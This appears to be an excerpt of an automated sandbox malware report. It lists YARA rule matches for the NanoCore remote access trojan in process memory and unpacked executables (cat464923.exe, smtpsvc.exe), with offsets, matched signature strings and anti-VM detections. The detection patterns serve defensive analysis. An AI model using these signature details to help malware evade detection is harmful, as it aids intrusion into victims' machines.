00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x43145:$a: NanoCore 0x4319e:$a: NanoCore 0x431db:$a: NanoCore 0x43254:$a: NanoCore 0x568ff:$a: NanoCore 0x56914:$a: NanoCore 0x56949:$a: NanoCore 0x6f903:$a: NanoCore 0x6f918:$a: NanoCore 0x6f94d:$a: NanoCore 0x431a7:$b: ClientPlugin 0x431e4:$b: ClientPlugin 0x43ae2:$b: ClientPlugin 0x43aef:$b: ClientPlugin 0x566bb:$b: ClientPlugin 0x566d6:$b: ClientPlugin 0x56706:$b: ClientPlugin 0x5691d:$b: ClientPlugin 0x56952:$b: ClientPlugin 0x6f6bf:$b: ClientPlugin 0x6f6da:$b: ClientPlugin
00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24be3:$a: NanoCore 0x24c3c:$a: NanoCore 0x24c79:$a: NanoCore 0x24cf2:$a: NanoCore 0x24c45:$b: ClientPlugin 0x24c82:$b: ClientPlugin 0x25580:$b: ClientPlugin 0x2558d:$b: ClientPlugin 0x1ad6b:$e: KeepAlive 0x250cd:$g: LogClientMessage 0x2504d:$i: get_Connected 0x15019:$j: #=q 0x15049:$j: #=q 0x15085:$j: #=q 0x150ad:$j: #=q 0x150dd:$j: #=q 0x1510d:$j: #=q 0x1513d:$j: #=q 0x1516d:$j: #=q 0x15189:$j: #=q 0x151b9:$j: #=q
00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24be3:$a: NanoCore 0x24c3c:$a: NanoCore 0x24c79:$a: NanoCore 0x24cf2:$a: NanoCore 0x24c45:$b: ClientPlugin 0x24c82:$b: ClientPlugin 0x25580:$b: ClientPlugin 0x2558d:$b: ClientPlugin 0x1ad6b:$e: KeepAlive 0x250cd:$g: LogClientMessage 0x2504d:$i: get_Connected 0x15019:$j: #=q 0x15049:$j: #=q 0x15085:$j: #=q 0x150ad:$j: #=q 0x150dd:$j: #=q 0x1510d:$j: #=q 0x1513d:$j: #=q 0x1516d:$j: #=q 0x15189:$j: #=q 0x151b9:$j: #=q
0000000D.00000002.2209835071.00000000023AC000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xdbf0d:$x1: NanoCore.ClientPluginHost 0xdbf4a:$x2: IClientNetworkHost 0xdfa7d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xdbc75:$a: NanoCore 0xdbc85:$a: NanoCore 0xdbeb9:$a: NanoCore 0xdbecd:$a: NanoCore 0xdbf0d:$a: NanoCore 0xdbcd4:$b: ClientPlugin 0xdbed6:$b: ClientPlugin 0xdbf16:$b: ClientPlugin 0xdbdfb:$c: ProjectData 0xdc802:$d: DESCrypto 0xe41ce:$e: KeepAlive 0xe21bc:$g: LogClientMessage 0xde3b7:$i: get_Connected 0x5ab30:$j: #=q 0xdcb38:$j: #=q 0xdcb68:$j: #=q 0xdcb84:$j: #=q 0xdcbb4:$j: #=q 0xdcbd0:$j: #=q 0xdcbec:$j: #=q 0xdcc1c:$j: #=q
00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xdbf0d:$x1: NanoCore.ClientPluginHost 0xdbf4a:$x2: IClientNetworkHost 0xdfa7d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xdbc75:$a: NanoCore 0xdbc85:$a: NanoCore 0xdbeb9:$a: NanoCore 0xdbecd:$a: NanoCore 0xdbf0d:$a: NanoCore 0xdbcd4:$b: ClientPlugin 0xdbed6:$b: ClientPlugin 0xdbf16:$b: ClientPlugin 0xdbdfb:$c: ProjectData 0xdc802:$d: DESCrypto 0xe41ce:$e: KeepAlive 0xe21bc:$g: LogClientMessage 0xde3b7:$i: get_Connected 0x5ab30:$j: #=q 0xdcb38:$j: #=q 0xdcb68:$j: #=q 0xdcb84:$j: #=q 0xdcbb4:$j: #=q 0xdcbd0:$j: #=q 0xdcbec:$j: #=q 0xdcc1c:$j: #=q
0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x9c135:$x1: NanoCore.ClientPluginHost 0x9c172:$x2: IClientNetworkHost 0x9fca5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x9be9d:$a: NanoCore 0x9bead:$a: NanoCore 0x9c0e1:$a: NanoCore 0x9c0f5:$a: NanoCore 0x9c135:$a: NanoCore 0x9befc:$b: ClientPlugin 0x9c0fe:$b: ClientPlugin 0x9c13e:$b: ClientPlugin 0x9c023:$c: ProjectData 0x193921:$c: ProjectData 0x9ca2a:$d: DESCrypto 0xa43f6:$e: KeepAlive 0xa23e4:$g: LogClientMessage 0x9e5df:$i: get_Connected 0x9cd60:$j: #=q 0x9cd90:$j: #=q 0x9cdac:$j: #=q 0x9cddc:$j: #=q 0x9cdf8:$j: #=q 0x9ce14:$j: #=q 0x9ce44:$j: #=q
0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000B.00000002.2211026677.000000000226A000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: smtpsvc.exe PID: 2416	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4a6035:$x1: NanoCore.ClientPluginHost 0x4a6096:$x2: IClientNetworkHost 0x4ab49b:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4b940d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: smtpsvc.exe PID: 2416	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: smtpsvc.exe PID: 2416	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: smtpsvc.exe PID: 2416	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4a5b3a:$a: NanoCore 0x4a5b56:$a: NanoCore 0x4a5cb1:$a: NanoCore 0x4a5cc0:$a: NanoCore 0x4a5f99:$a: NanoCore 0x4a5fc5:$a: NanoCore 0x4a6035:$a: NanoCore 0x4b5a77:$a: NanoCore 0x4b5a89:$a: NanoCore 0x4b5ac5:$a: NanoCore 0x4a5be1:$b: ClientPlugin 0x4a5d0a:$b: ClientPlugin 0x4a5fce:$b: ClientPlugin 0x4a603e:$b: ClientPlugin 0x4b5a92:$b: ClientPlugin 0x4b5ace:$b: ClientPlugin 0x190811:$c: ProjectData 0x191701:$c: ProjectData 0x38128f:$c: ProjectData 0x3819ab:$c: ProjectData 0x4a5e57:$c: ProjectData
Process Memory Space: cat464923.exe PID: 2468	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf4169:$x1: NanoCore.ClientPluginHost 0xf41ca:$x2: IClientNetworkHost 0xf95cf:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x107541:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: cat464923.exe PID: 2468	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: cat464923.exe PID: 2468	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: cat464923.exe PID: 2468	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf3c6e:$a: NanoCore 0xf3c8a:$a: NanoCore 0xf3de5:$a: NanoCore 0xf3df4:$a: NanoCore 0xf40cd:$a: NanoCore 0xf40f9:$a: NanoCore 0xf4169:$a: NanoCore 0x103bab:$a: NanoCore 0x103bbd:$a: NanoCore 0x103bf9:$a: NanoCore 0xf3d15:$b: ClientPlugin 0xf3e3e:$b: ClientPlugin 0xf4102:$b: ClientPlugin 0xf4172:$b: ClientPlugin 0x103bc6:$b: ClientPlugin 0x103c02:$b: ClientPlugin 0x73c7d:$c: ProjectData 0x74b6d:$c: ProjectData 0xf3f8b:$c: ProjectData 0x103af8:$c: ProjectData 0x12456c:$c: ProjectData
Process Memory Space: cat464923.exe PID: 2324	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x47bf6:$x1: NanoCore.ClientPluginHost 0x55024:$x1: NanoCore.ClientPluginHost 0x6e405:$x1: NanoCore.ClientPluginHost 0xedc05:$x1: NanoCore.ClientPluginHost 0x11da3d:$x1: NanoCore.ClientPluginHost 0x1235fc:$x1: NanoCore.ClientPluginHost 0x1349ba:$x1: NanoCore.ClientPluginHost 0x4376e2:$x1: NanoCore.ClientPluginHost 0x47c1c:$x2: IClientNetworkHost 0x5504a:$x2: IClientNetworkHost 0x6e466:$x2: IClientNetworkHost 0xedc4a:$x2: IClientNetworkHost 0x11da63:$x2: IClientNetworkHost 0x123641:$x2: IClientNetworkHost 0x1349ff:$x2: IClientNetworkHost 0x437743:$x2: IClientNetworkHost 0x7386b:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x817dd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x43cb48:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x44aaba:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: cat464923.exe PID: 2324	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: cat464923.exe PID: 2324	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x399ae:$a: NanoCore 0x47ae8:$a: NanoCore 0x47b89:$a: NanoCore 0x47bf6:$a: NanoCore 0x47cb7:$a: NanoCore 0x48b88:$a: NanoCore 0x48bdb:$a: NanoCore 0x48c14:$a: NanoCore 0x48c87:$a: NanoCore 0x4acfd:$a: NanoCore 0x4ad65:$a: NanoCore 0x4aea6:$a: NanoCore 0x54f16:$a: NanoCore 0x54fb7:$a: NanoCore 0x55024:$a: NanoCore 0x550e5:$a: NanoCore 0x55fb6:$a: NanoCore 0x56009:$a: NanoCore 0x56042:$a: NanoCore 0x560b5:$a: NanoCore 0x6df0a:$a: NanoCore
Process Memory Space: cat464923.exe PID: 2668	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x315687:$x1: NanoCore.ClientPluginHost 0x3156e8:$x2: IClientNetworkHost 0x31aaed:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x328a5f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: cat464923.exe PID: 2668	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: cat464923.exe PID: 2668	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: cat464923.exe PID: 2668	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x31518c:$a: NanoCore 0x3151a8:$a: NanoCore 0x315303:$a: NanoCore 0x315312:$a: NanoCore 0x3155eb:$a: NanoCore 0x315617:$a: NanoCore 0x315687:$a: NanoCore 0x3250c9:$a: NanoCore 0x3250db:$a: NanoCore 0x325117:$a: NanoCore 0x315233:$b: ClientPlugin 0x31535c:$b: ClientPlugin 0x315620:$b: ClientPlugin 0x315690:$b: ClientPlugin 0x3250e4:$b: ClientPlugin 0x325120:$b: ClientPlugin 0x1ab284:$c: ProjectData 0x1ab9a0:$c: ProjectData 0x3154a9:$c: ProjectData 0x325016:$c: ProjectData 0x345a8a:$c: ProjectData
Click to see the 94 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
17.0.smtpsvc.exe.400000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
17.0.smtpsvc.exe.400000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
17.0.smtpsvc.exe.400000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
17.0.smtpsvc.exe.400000.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
17.0.smtpsvc.exe.400000.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
17.0.smtpsvc.exe.400000.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
17.0.smtpsvc.exe.400000.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
17.0.smtpsvc.exe.400000.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
17.2.smtpsvc.exe.2324e04.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
17.2.smtpsvc.exe.2324e04.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
18.0.smtpsvc.exe.400000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
18.0.smtpsvc.exe.400000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
18.0.smtpsvc.exe.400000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
18.0.smtpsvc.exe.400000.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.cat464923.exe.34e019c.10.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
5.2.cat464923.exe.34e019c.10.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
5.2.cat464923.exe.34e019c.10.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.cat464923.exe.4a0000.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
5.2.cat464923.exe.4a0000.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
5.2.cat464923.exe.4a0000.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
18.2.smtpsvc.exe.339b366.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d5e7:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d614:$x2: IClientNetworkHost
18.2.smtpsvc.exe.339b366.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d5e7:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e6c2:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d601:$s5: IClientLoggingHost
18.2.smtpsvc.exe.339b366.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
18.2.smtpsvc.exe.339b366.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d59d:$a: NanoCore 0x2d5b2:$a: NanoCore 0x2d5e7:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2d359:$b: ClientPlugin 0x2d374:$b: ClientPlugin
13.2.smtpsvc.exe.3444d80.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
13.2.smtpsvc.exe.3444d80.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
13.2.smtpsvc.exe.3444d80.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.smtpsvc.exe.3444d80.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
5.2.cat464923.exe.34db366.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d5e7:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d614:$x2: IClientNetworkHost
5.2.cat464923.exe.34db366.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d5e7:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e6c2:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d601:$s5: IClientLoggingHost
5.2.cat464923.exe.34db366.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
